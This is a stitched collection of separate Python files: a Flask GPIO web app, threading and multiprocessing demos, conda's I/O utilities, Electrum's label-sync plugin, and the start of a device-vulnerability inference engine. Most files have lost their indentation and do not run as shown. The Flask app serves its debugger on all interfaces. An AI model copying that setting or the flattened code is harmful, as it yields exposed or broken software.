            # matching display colour.
            idx = int(choice) - 1
            if buttonSts_p1[idx] == "/static/img/img_on.png":
                buttonSts_p1[idx] = "/static/img/img_off.png"
                color[idx] = "#333333"
            else:
                buttonSts_p1[idx] = "/static/img/img_on.png"
                color[idx] = "#FFFFFF"
        elif choice == 'page_2':
            return redirect(url_for('page2'))
        else:
            pass
gpio_modif()
return render_template('page1.html', button=buttonSts_p1, color=color, time=current_time, warning=warning)
@app.route("/page2", methods = ['POST', 'GET'])
def page2():
current_time = getTime()
if not g.user:
return redirect(url_for('login'))
if request.method == 'POST':
if request.form['button_p1'] == '1':
buttonSts_p2[0] = "/static/img/img_on.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_on.png"
color[i] = "#FFFFFF"
elif request.form['button_p1'] == '2':
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_off.png"
buttonSts_p2[i] = "/static/img/img_off.png"
color[i] = "#333333"
elif request.form['button_p1'] == '3':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8, 2):
color[i] = "#FFFFFF"
color[i + 1] = "#333333"
buttonSts_p1[i] = "/static/img/img_on.png"
buttonSts_p1[i + 1] = "/static/img/img_off.png"
elif request.form['button_p1'] == '4':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i < 3:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else :
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == '5':
buttonSts_p2[0] = "/static/img/img_off.png"
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(0, 8):
if i > 3 and i != 7:
color[i] = "#FFFFFF"
buttonSts_p1[i] = "/static/img/img_on.png"
else:
color[i] = "#333333"
buttonSts_p1[i] = "/static/img/img_off.png"
elif request.form['button_p1'] == 'page_1':
return redirect(url_for('page1'))
else:
pass
gpio_modif()
return render_template('page2.html', button=buttonSts_p2, color=color, time=current_time, warning=warning)
@app.route("/settings", methods = ['POST', 'GET'])
def settings(setting=None):
if g.user.id == 3:
return redirect(url_for('page1'))
if not g.user.username == "admin":
return redirect(url_for('login'))
current_time = getTime()
if request.method == 'POST':
check1 = request.form.get('Auto on')
time1 = request.form.get('time Auto on')
check2 = request.form.get('Auto off')
time2 = request.form.get('time Auto off')
file = open('config.csv', "w", newline='')
header = ['name','state','param1']
csvf = csv.DictWriter(file, fieldnames=header)
csvf.writeheader()
csvf.writerow({'name': 'Auto on', 'state': check1, 'param1': time1})
csvf.writerow({'name': 'Auto off', 'state': check2, 'param1': time2})
file.close()
return redirect(url_for('page1'))
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
return render_template('settings.html', time=current_time, settings=rows, warning=warning)
@app.before_first_request
def activate_job():
def run_job():
while True:
t = getTime()
with open('config.csv', "r") as f:
csvreader = csv.reader(f)
header = next(csvreader)
rows = []
for row in csvreader:
rows.append(row)
day = datetime.datetime.today().weekday()
#0 monday / 6 sunday
#ALL ON and ALL OFF
if rows[0][1] == 'on' and t == rows[0][2] and day < 5:
buttonSts_p2[0] = "/static/img/img_on.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_on.png"
color[i] = "#FFFFFF"
gpio_modif()
if rows[1][1] == 'on' and t == rows[1][2] and day < 5:
buttonSts_p2[1] = "/static/img/img_off.png"
for i in range(8):
buttonSts_p1[i] = "/static/img/img_off.png"
buttonSts_p2[i] = "/static/img/img_off.png"
color[i] = "#333333"
gpio_modif()
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as ftemp:
global warning
temp = int(ftemp.read()) / 1000
if temp > 60:
warning = "Temp = " + str(int(temp)) + "°"
else:
warning = ""
time.sleep(60)
thread = threading.Thread(target=run_job)
thread.start()
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True,)
GPIO.cleanup()
|
multithread_fib.py
|
'''Compute fibonacci numbers with multiple threads to show the GIL'''
import random
import threading
import compute
import syscall
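# NOTE: compute and syscall are local helper modules that are not shown here;
# compute.fib is the CPU-bound Fibonacci function applied below and
# syscall.gettid returns the OS thread id used by the monitor decorator.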
def thread_func_monitor(func):
def wrapper(*args, **kargs):
print(f'Function {func.__name__} executed by thread {syscall.gettid()}')
return func(*args, **kargs)
return wrapper
@thread_func_monitor
def apply(data, func, start, stop, results):
    '''Apply func to each element of data in the half-open range [start, stop).'''
results.extend([func(x) for x in data[start:stop]])
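# Each worker thread writes into its own results list, so no locking is
# needed; the GIL still serializes the CPU-bound fib calls, which is what this
# demo is meant to show.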
def main(nthreads=4):
numbers = random.choices(population=range(23, 26), k=300)
chunk = len(numbers) // nthreads
starts = range(0, nthreads * chunk, chunk)
stops = list(range(chunk, nthreads * chunk + 1, chunk))
stops[-1] = len(numbers)
threads = []
threads_results = []
for start, stop in zip(starts, stops):
threads_results.append([])
results = threads_results[-1]
t = threading.Thread(target=apply, args=(numbers, compute.fib, start, stop, results))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for results in threads_results:
print(' -> ', results)
if __name__ == '__main__':
main()
|
mp.py
|
from multiprocessing import Process, Value, Array, Lock
import numpy as np
# Not used in the final code, but some multiprocessing practice in Python.
x = [1]
def f(a, lock):
lock.acquire()
for i in range(len(a)):
a[i] = -a[i]
lock.release()
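# Each of the 11 processes negates every element of the shared Array while
# holding the Lock, so the passes do not interleave; an odd number of passes
# leaves the array holding the negated values of 0..10.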
if __name__ == '__main__':
lock = Lock()
jobs = []
arr = Array('i', range(11))
for i in range(11):
p = Process(target=f, args=(arr, lock))
jobs.append(p)
p.start()
for i in range(11):
jobs[i].join()
|
io.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor, _base, as_completed
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import wraps
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
import sys
from threading import Event, Thread
from time import sleep, time
from .compat import StringIO, iteritems, on_win
from .constants import NULL
from .path import expand
from .._vendor.auxlib.decorators import memoizemethod
from .._vendor.auxlib.logz import NullHandler
from .._vendor.auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
"""
Logging formatter with additional attributes for run time logging.
Attributes:
`delta_secs`:
Elapsed seconds since last log/format call (or creation of logger).
`relative_created_secs`:
Like `relativeCreated`, time relative to the initialization of the
`logging` module but conveniently scaled to seconds as a `float` value.
"""
def __init__(self, fmt=None, datefmt=None):
self.prev_time = time()
super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def format(self, record):
now = time()
prev_time = self.prev_time
self.prev_time = max(self.prev_time, now)
record.delta_secs = now - prev_time
record.relative_created_secs = record.relativeCreated / 1000
return super(DeltaSecondsFormatter, self).format(record)
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
_FORMATTER = DeltaSecondsFormatter(
"%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
else:
_FORMATTER = Formatter(
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
def dashlist(iterable, indent=2):
return ''.join('\n' + ' ' * indent + '- ' + str(x) for x in iterable)
class ContextDecorator(object):
"""Base class for a context manager class (implementing __enter__() and __exit__()) that also
makes it a decorator.
"""
# TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA
def __call__(self, f):
@wraps(f)
def decorated(*args, **kwds):
with self:
return f(*args, **kwds)
return decorated
class SwallowBrokenPipe(ContextDecorator):
# Ignore BrokenPipeError and errors related to stdout or stderr being
# closed by a downstream program.
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_val
and isinstance(exc_val, EnvironmentError)
and getattr(exc_val, 'errno', None)
and exc_val.errno in (EPIPE, ESHUTDOWN)):
return True
swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
"""Constants used for contextmanager captured.
Used similarly like the constants PIPE, STDOUT for stdlib's subprocess.Popen.
"""
STRING = -1
STDOUT = -2
@contextmanager
def env_var(name, value, callback=None):
# NOTE: will likely want to call reset_context() when using this function, so pass
# it as callback
name, value = str(name), str(value)
saved_env_var = os.environ.get(name)
try:
os.environ[name] = value
if callback:
callback()
yield
finally:
if saved_env_var:
os.environ[name] = saved_env_var
else:
del os.environ[name]
if callback:
callback()
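# Usage sketch (illustrative, not part of the original module; MY_VAR is a
# placeholder name):
#
#     with env_var('MY_VAR', '1', callback=reset_context):
#         ...  # os.environ['MY_VAR'] == '1' inside the block
#     # the previous value (or absence) of MY_VAR is restored afterwards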
@contextmanager
def env_vars(var_map, callback=None):
# NOTE: will likely want to call reset_context() when using this function, so pass
# it as callback
saved_vars = {str(name): os.environ.get(name, NULL) for name in var_map}
try:
for name, value in iteritems(var_map):
os.environ[str(name)] = str(value)
if callback:
callback()
yield
finally:
for name, value in iteritems(saved_vars):
if value is NULL:
del os.environ[name]
else:
os.environ[name] = value
if callback:
callback()
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
"""Capture outputs of sys.stdout and sys.stderr.
If stdout is STRING, capture sys.stdout as a string,
if stdout is None, do not capture sys.stdout, leaving it untouched,
otherwise redirect sys.stdout to the file-like object given by stdout.
Behave correspondingly for stderr with the exception that if stderr is STDOUT,
redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.
Args:
stdout: capture target for sys.stdout, one of STRING, None, or file-like object
stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object
Yields:
CapturedText: has attributes stdout, stderr which are either strings, None or the
corresponding file-like function argument.
"""
# NOTE: This function is not thread-safe. Using within multi-threading may cause spurious
# behavior of not returning sys.stdout and sys.stderr back to their 'proper' state
# """
# Context manager to capture the printed output of the code in the with block
#
# Bind the context manager to a variable using `as` and the result will be
# in the stdout property.
#
# >>> from conda.common.io import captured
# >>> with captured() as c:
# ... print('hello world!')
# ...
# >>> c.stdout
# 'hello world!\n'
# """
class CapturedText(object):
pass
saved_stdout, saved_stderr = sys.stdout, sys.stderr
if stdout == CaptureTarget.STRING:
sys.stdout = outfile = StringIO()
else:
outfile = stdout
if outfile is not None:
sys.stdout = outfile
if stderr == CaptureTarget.STRING:
sys.stderr = errfile = StringIO()
elif stderr == CaptureTarget.STDOUT:
sys.stderr = errfile = outfile
else:
errfile = stderr
if errfile is not None:
sys.stderr = errfile
c = CapturedText()
log.info("overtaking stderr and stdout")
try:
yield c
finally:
if stdout == CaptureTarget.STRING:
c.stdout = outfile.getvalue()
else:
c.stdout = outfile
if stderr == CaptureTarget.STRING:
c.stderr = errfile.getvalue()
elif stderr == CaptureTarget.STDOUT:
c.stderr = None
else:
c.stderr = errfile
sys.stdout, sys.stderr = saved_stdout, saved_stderr
log.info("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
saved_args = sys.argv
sys.argv = args_list
try:
yield
finally:
sys.argv = saved_args
@contextmanager
def _logger_lock():
logging._acquireLock()
try:
yield
finally:
logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
logr = getLogger(logger_name)
_lvl, _dsbld, _prpgt = logr.level, logr.disabled, logr.propagate
null_handler = NullHandler()
with _logger_lock():
logr.addHandler(null_handler)
logr.setLevel(CRITICAL + 1)
logr.disabled, logr.propagate = True, False
try:
yield
finally:
with _logger_lock():
logr.removeHandler(null_handler) # restore list logr.handlers
logr.level, logr.disabled = _lvl, _dsbld
logr.propagate = _prpgt
@contextmanager
def stderr_log_level(level, logger_name=None):
logr = getLogger(logger_name)
_hndlrs, _lvl, _dsbld, _prpgt = logr.handlers, logr.level, logr.disabled, logr.propagate
handler = StreamHandler(sys.stderr)
handler.name = 'stderr'
handler.setLevel(level)
handler.setFormatter(_FORMATTER)
with _logger_lock():
logr.setLevel(level)
logr.handlers, logr.disabled, logr.propagate = [], False, False
logr.addHandler(handler)
logr.setLevel(level)
try:
yield
finally:
with _logger_lock():
logr.handlers, logr.level, logr.disabled = _hndlrs, _lvl, _dsbld
logr.propagate = _prpgt
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
# get old stderr logger
logr = getLogger(logger_name)
old_stderr_handler = next((handler for handler in logr.handlers if handler.name == 'stderr'),
None)
# create new stderr logger
new_stderr_handler = StreamHandler(sys.stderr)
new_stderr_handler.name = 'stderr'
new_stderr_handler.setLevel(NOTSET)
new_stderr_handler.setFormatter(formatter or _FORMATTER)
# do the switch
with _logger_lock():
if old_stderr_handler:
logr.removeHandler(old_stderr_handler)
logr.addHandler(new_stderr_handler)
logr.setLevel(level)
logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
"""Enforce a maximum time for a callable to complete.
Not yet implemented on Windows.
"""
default_return = kwargs.pop('default_return', None)
if on_win:
# Why does Windows have to be so difficult all the time? Kind of gets old.
# Guess we'll bypass Windows timeouts for now.
try:
return func(*args, **kwargs)
except KeyboardInterrupt: # pragma: no cover
return default_return
else:
class TimeoutException(Exception):
pass
def interrupt(signum, frame):
raise TimeoutException()
signal.signal(signal.SIGALRM, interrupt)
signal.alarm(timeout_secs)
try:
ret = func(*args, **kwargs)
signal.alarm(0)
return ret
except (TimeoutException, KeyboardInterrupt): # pragma: no cover
return default_return
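# Usage sketch (illustrative): give a callable at most 5 seconds to finish,
# falling back to None if the alarm fires or the user interrupts.
# some_slow_callable and arg1 are placeholder names.
#
#     result = timeout(5, some_slow_callable, arg1, default_return=None)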
class Spinner(object):
"""
Args:
message (str):
A message to prefix the spinner with. The string ': ' is automatically appended.
enabled (bool):
If False, usage is a no-op.
json (bool):
If True, will not output non-json to stdout.
"""
# spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
spinner_cycle = cycle('/-\\|')
def __init__(self, message, enabled=True, json=False):
self.message = message
self.enabled = enabled
self.json = json
self._stop_running = Event()
self._spinner_thread = Thread(target=self._start_spinning)
self._indicator_length = len(next(self.spinner_cycle)) + 1
self.fh = sys.stdout
self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
def start(self):
if self.show_spin:
self._spinner_thread.start()
elif not self.json:
self.fh.write("...working... ")
self.fh.flush()
def stop(self):
if self.show_spin:
self._stop_running.set()
self._spinner_thread.join()
self.show_spin = False
def _start_spinning(self):
try:
while not self._stop_running.is_set():
self.fh.write(next(self.spinner_cycle) + ' ')
self.fh.flush()
sleep(0.10)
self.fh.write('\b' * self._indicator_length)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.stop()
else:
raise
@swallow_broken_pipe
def __enter__(self):
if not self.json:
sys.stdout.write("%s: " % self.message)
sys.stdout.flush()
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if not self.json:
with swallow_broken_pipe:
if exc_type or exc_val:
sys.stdout.write("failed\n")
else:
sys.stdout.write("done\n")
sys.stdout.flush()
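# Usage sketch (illustrative): Spinner is a context manager, so a typical call
# site looks like the following (do_long_running_work is a placeholder):
#
#     with Spinner("Collecting package metadata", enabled=True, json=False):
#         do_long_running_work()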
class ProgressBar(object):
def __init__(self, description, enabled=True, json=False):
"""
Args:
description (str):
The name of the progress bar, shown on left side of output.
enabled (bool):
If False, usage is a no-op.
json (bool):
If true, outputs json progress to stdout rather than a progress bar.
Currently, the json format assumes this is only used for "fetch", which
maintains backward compatibility with conda 4.3 and earlier behavior.
"""
self.description = description
self.enabled = enabled
self.json = json
if json:
pass
elif enabled:
bar_format = "{desc}{bar} | {percentage:3.0f}% "
try:
self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
file=sys.stdout)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def update_to(self, fraction):
try:
if self.json and self.enabled:
sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
% (self.description, fraction))
elif self.enabled:
self.pbar.update(fraction - self.pbar.n)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def finish(self):
self.update_to(1)
@swallow_broken_pipe
def close(self):
if self.enabled and self.json:
sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
% self.description)
sys.stdout.flush()
elif self.enabled:
self.pbar.close()
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
def __init__(self, max_workers=10):
super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
def submit(self, fn, *args, **kwargs):
"""
This is an exact reimplementation of the `submit()` method on the parent class, except
with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
least one living thread, this thread pool will not throw an exception if threads cannot
be expanded to `max_workers`.
In the implementation, we use "protected" attributes from concurrent.futures (`_base`
and `_WorkItem`). Consider vendoring the whole concurrent.futures library
as an alternative to these protected imports.
https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = _base.Future()
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
try:
self._adjust_thread_count()
except RuntimeError:
# RuntimeError: can't start new thread
# See https://github.com/conda/conda/issues/6624
if len(self._threads) > 0:
# It's ok to not be able to start new threads if we already have at least
# one thread alive.
pass
else:
raise
return f
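    # Re-export concurrent.futures.as_completed so callers holding an executor
    # instance can reach it without an extra import.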
as_completed = as_completed
def get_instrumentation_record_file():
default_record_file = join('~', '.conda', 'instrumentation-record.csv')
return expand(os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE", default_record_file))
class time_recorder(ContextDecorator): # pragma: no cover
record_file = get_instrumentation_record_file()
start_time = None
total_call_num = defaultdict(int)
total_run_time = defaultdict(float)
def __init__(self, entry_name=None, module_name=None):
self.entry_name = entry_name
self.module_name = module_name
def _set_entry_name(self, f):
if self.entry_name is None:
if hasattr(f, '__qualname__'):
entry_name = f.__qualname__
else:
entry_name = ':' + f.__name__
if self.module_name:
entry_name = '.'.join((self.module_name, entry_name))
self.entry_name = entry_name
def __call__(self, f):
self._set_entry_name(f)
return super(time_recorder, self).__call__(f)
def __enter__(self):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if enabled and boolify(enabled):
self.start_time = time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.start_time:
entry_name = self.entry_name
end_time = time()
run_time = end_time - self.start_time
self.total_call_num[entry_name] += 1
self.total_run_time[entry_name] += run_time
self._ensure_dir()
with open(self.record_file, 'a') as fh:
fh.write("%s,%f\n" % (entry_name, run_time))
# total_call_num = self.total_call_num[entry_name]
# total_run_time = self.total_run_time[entry_name]
# log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)
@classmethod
def log_totals(cls):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if not (enabled and boolify(enabled)):
return
log.info('=== time_recorder total time and calls ===')
for entry_name in sorted(cls.total_run_time.keys()):
log.info(
'TOTAL %9.3f % 9d %s',
cls.total_run_time[entry_name],
cls.total_call_num[entry_name],
entry_name,
)
@memoizemethod
def _ensure_dir(self):
if not isdir(dirname(self.record_file)):
os.makedirs(dirname(self.record_file))
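# Usage sketch (illustrative): time_recorder works both as a decorator and as
# a context manager; timings are appended to the record file only when the
# CONDA_INSTRUMENTATION_ENABLED environment variable is truthy.
# expensive_step is a placeholder function name.
#
#     @time_recorder(module_name=__name__)
#     def expensive_step():
#         ...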
def print_instrumentation_data(): # pragma: no cover
record_file = get_instrumentation_record_file()
grouped_data = defaultdict(list)
final_data = {}
if not isfile(record_file):
return
with open(record_file) as fh:
for line in fh:
entry_name, total_time = line.strip().split(',')
grouped_data[entry_name].append(float(total_time))
for entry_name in sorted(grouped_data):
all_times = grouped_data[entry_name]
counts = len(all_times)
total_time = sum(all_times)
average_time = total_time / counts
final_data[entry_name] = {
'counts': counts,
'total_time': total_time,
'average_time': average_time,
}
print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
if __name__ == "__main__":
print_instrumentation_data()
|
labels.py
|
import hashlib
import requests
import threading
import json
import sys
import traceback
import base64
import electrum
from electrum.plugins import BasePlugin, hook
from electrum.i18n import _
class LabelsPlugin(BasePlugin):
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.target_host = 'labels.electrum.org'
self.wallets = {}
def encode(self, wallet, msg):
password, iv, wallet_id = self.wallets[wallet]
encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv,
msg.encode('utf8'))
return base64.b64encode(encrypted).decode()
def decode(self, wallet, message):
password, iv, wallet_id = self.wallets[wallet]
decoded = base64.b64decode(message)
decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded)
return decrypted.decode('utf8')
def get_nonce(self, wallet):
# nonce is the nonce to be used with the next change
nonce = wallet.storage.get('wallet_nonce')
if nonce is None:
nonce = 1
self.set_nonce(wallet, nonce)
return nonce
def set_nonce(self, wallet, nonce):
self.print_error("set", wallet.basename(), "nonce to", nonce)
wallet.storage.put("wallet_nonce", nonce)
@hook
def set_label(self, wallet, item, label):
if not wallet in self.wallets:
return
if not item:
return
nonce = self.get_nonce(wallet)
wallet_id = self.wallets[wallet][2]
bundle = {"walletId": wallet_id,
"walletNonce": nonce,
"externalId": self.encode(wallet, item),
"encryptedLabel": self.encode(wallet, label)}
t = threading.Thread(target=self.do_request,
args=["POST", "/label", False, bundle])
t.setDaemon(True)
t.start()
# Caller will write the wallet
self.set_nonce(wallet, nonce + 1)
def do_request(self, method, url = "/labels", is_batch=False, data=None):
url = 'https://' + self.target_host + url
kwargs = {'headers': {}}
if method == 'GET' and data:
kwargs['params'] = data
elif method == 'POST' and data:
kwargs['data'] = json.dumps(data)
kwargs['headers']['Content-Type'] = 'application/json'
response = requests.request(method, url, **kwargs)
if response.status_code != 200:
raise BaseException(response.status_code, response.text)
response = response.json()
if "error" in response:
raise BaseException(response["error"])
return response
def push_thread(self, wallet):
wallet_id = self.wallets[wallet][2]
bundle = {"labels": [],
"walletId": wallet_id,
"walletNonce": self.get_nonce(wallet)}
for key, value in wallet.labels.items():
try:
encoded_key = self.encode(wallet, key)
encoded_value = self.encode(wallet, value)
except:
self.print_error('cannot encode', repr(key), repr(value))
continue
bundle["labels"].append({'encryptedLabel': encoded_value,
'externalId': encoded_key})
self.do_request("POST", "/labels", True, bundle)
def pull_thread(self, wallet, force):
wallet_id = self.wallets[wallet][2]
nonce = 1 if force else self.get_nonce(wallet) - 1
self.print_error("asking for labels since nonce", nonce)
try:
response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) ))
if response["labels"] is None:
self.print_error('no new labels')
return
result = {}
for label in response["labels"]:
try:
key = self.decode(wallet, label["externalId"])
value = self.decode(wallet, label["encryptedLabel"])
except:
continue
try:
json.dumps(key)
json.dumps(value)
except:
self.print_error('error: no json', key)
continue
result[key] = value
for key, value in result.items():
if force or not wallet.labels.get(key):
wallet.labels[key] = value
self.print_error("received %d labels" % len(response))
# do not write to disk because we're in a daemon thread
wallet.storage.put('labels', wallet.labels)
self.set_nonce(wallet, response["nonce"] + 1)
self.on_pulled(wallet)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.print_error("could not retrieve labels")
def start_wallet(self, wallet):
nonce = self.get_nonce(wallet)
self.print_error("wallet", wallet.basename(), "nonce is", nonce)
mpk = wallet.get_fingerprint()
if not mpk:
return
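        # Derive the per-wallet key material: the AES password comes from the
        # wallet fingerprint (master public key), the IV from that password,
        # and the server-side wallet_id from the fingerprint itself.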
mpk = mpk.encode('ascii')
password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii')
iv = hashlib.sha256(password).digest()[:16]
wallet_id = hashlib.sha256(mpk).hexdigest()
self.wallets[wallet] = (password, iv, wallet_id)
# If there is an auth token we can try to actually start syncing
t = threading.Thread(target=self.pull_thread, args=(wallet, False))
t.setDaemon(True)
t.start()
def stop_wallet(self, wallet):
self.wallets.pop(wallet, None)
|
inference.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright (2021) Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# }}}
'''
Inference engine running Bayesian probability analysis to detect devices and their vulnerabilities.
'''
import sys
string_type = None
if sys.version_info[0] >= 3:
unicode = str
string_type = str
else:
string_type = basestring
import logging
logger = logging.getLogger(__name__)
DEBUG = True
def printD(m):
if DEBUG:
logger.debug(m)
import os
import json
from os import listdir
from os.path import isfile, join
from math import *
from io import open
import gevent
from gevent import socket as gsock
from gevent import sleep
from gevent.lock import BoundedSemaphore
from time import sleep
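# NOTE: "from time import sleep" above shadows the gevent sleep imported two
# lines earlier; the code shown here calls time.sleep() and gevent.sleep()
# explicitly, so the bare name is effectively unused.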
import time
import datetime
import multiprocessing
from multiprocessing import Manager
from ipaddress import ip_address, ip_network
import threading
from ..common.actor import Actor
try:
import yaml
except ImportError:
raise RuntimeError('PyYAML must be installed before running this script ')
import sqlite3
from .Databases import dbManager
from . import decisionSimple
from . import helper
from . import identifyIP
from . import identifyVulnerabilities
from .identifyIP import IpIdentifier
# Database files
E_DB_FILE = "e_db.sqlite" # evidence
D_DB_FILE = "d_db.sqlite" # devices
V_DB_FILE = "v_db.sqlite" # vendors
VULN_DB_FILE = "vuln_db.sqlite" # vulnerabilities
EVENTS_DB_FILE = "events_db.sqlite" # events
S_DB_FILE = "s_db.sqlite" # status
R_DB_FILE = "r_db.sqlite" # requests
# Paths
scans_path = "ssasse_platform/InferenceEngine/Scans/"
vendor_profiles_path = "ssasse_platform/InferenceEngine/Profiles/Vendors"
device_profiles_path = "ssasse_platform/InferenceEngine/Profiles/Devices"
class DeviceIdentificationEngine(Actor):
def __init__(self, config, rmq_connection):
printD("InferenceEngine.__init__()")
super(DeviceIdentificationEngine, self).__init__(config, rmq_connection)
self.config = config
thread = threading.Thread(target=self.geventLoop, args=())
thread.daemon = True
self.newPortEvidenceQueue = gevent.queue.Queue()
self.vulnerabilityStatus = {}
self.identifiedVulnerabilities = {}
self.identifyIPQueue = multiprocessing.Queue()
self.identifyVulnQueue = multiprocessing.Queue()
self.DBManager = dbManager.DBManager()
self.IpIdentifier = identifyIP.IpIdentifier(self.config, self.DBManager, None)
self.ServiceProcessor = identifyVulnerabilities.ServiceProcessor(self.config, self.DBManager, None)
#self.processEvidenceGreenlet = gevent.spawn(self.geventLoop)
thread.start()
gevent.spawn(self.setup_subscriptions)
self.internal_range = self.config.internal_ip_range
if self.internal_range is None:
printD("inference -- ERROR: internal range not set. Defaulting to 192.168.0.0/24")
self.internal_range = "192.168.0.0/24"
self.ping_sweep_processed = set()
self.ipRangeScanStatus = dict()
self.publishActor = None
self.rmq_socket = self._connection._connection.socket
def setup_subscriptions(self):
#printD("InferenceEngine.setup_subscriptions()")
while not self.connection_ready:
gevent.sleep(0.01)
# Subscribe to receive evidence messages from Evidence Manager
subscriptions = [dict(prefix='new_packet', queue_name='new_packet_queue', callback=self.new_packet_callback),
dict(prefix='packet', queue_name='evidence_queue', callback=self.evidence_callback),
dict(prefix='internal', queue_name='internal_queue', callback=self.internal_callback),
dict(prefix="active.results", queue_name="active_results_queue", callback=self.active_callback)]
self.add_subscriptions(subscriptions)
def new_packet_callback(self, topic, message):
#printD("InferenceEngine.new_packet_callback() - Received: {0}, {1}".format(topic, message))
pass
def evidence_callback(self, topic, message):
printD("InferenceEngine.evidence_callback() - ip: {0}, evidence callback: {1}, {2}, CTR:{3}".format(message.get("TARGET_IPADDR", None), topic, message, message["CTR"]))
